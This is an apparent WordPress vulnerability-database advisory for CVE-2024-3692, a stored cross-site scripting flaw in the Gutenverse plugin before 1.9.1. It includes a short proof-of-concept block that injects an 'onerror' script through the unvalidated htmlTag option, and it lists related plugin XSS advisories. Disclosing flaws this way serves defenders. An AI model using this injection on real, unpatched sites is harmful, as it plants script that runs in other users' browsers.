Gutenverse < 1.9.1 – Contributor+ Stored XSS | CVE 2024-3692 | Plugin Vulnerabilities

Description

The plugin does not validate the htmlTag option in various of its block before outputting it back in a page/post where the block is embed, which could allow users with the contributor role and above to perform Stored Cross-Site Scripting attacks

Proof of Concept

As a contributor, put the below code in a post when in Code Editor Mode:

<!-- wp:gutenverse/post-title {"elementId":"guten-sw5SZ2","htmlTag":"img src=x onerror=alert(/XSS-htmlTag/)"} -->
<div class="guten-element guten-post-title guten-sw5SZ2"></div>
<!-- /wp:gutenverse/post-title -->

The XS will be triggered when any user will (pre)view the post

Affects Plugins

Fixed in 1.9.1

References

CVE

URL

https://research.cleantalk.org/cve-2024-3692/

Classification

Type

XSS

OWASP top 10

A7: Cross-Site Scripting (XSS)

CWE

CVSS

Miscellaneous

Original Researcher

Dmtirii Ignatyev

Submitter

Dmtirii Ignatyev

Submitter website

https://research.cleantalk.org

Verified

Yes

WPVDB ID

6f100f85-3a76-44be-8092-06eb8595b0c9

Timeline

Publicly Published

2024-04-12 (about 1 year ago)

Added

2024-04-12 (about 1 year ago)

Last Updated

2024-04-12 (about 1 year ago)

Other

Published

Title

Published

2025-04-02

Title

Unlimited Elements For Elementor < 1.5.143 - Authenticated (Contributor+) Stored Cross-Site Scripting

Published

2025-01-15

Title

Online Payments < 3.30.0 - Contributor+ Stored XSS

Published

2023-11-09

Title

Simple Site Verify < 1.0.8 - Admin+ Stored XSS

Published

2016-05-20

Title

brafton WordPress Plugin <=3.4.7 - Reflected XSS

Published

2022-11-21

Title

Welcart e-Commerce < 2.8.4 - Multiple Subscriber+ Stored Cross-Site Scripting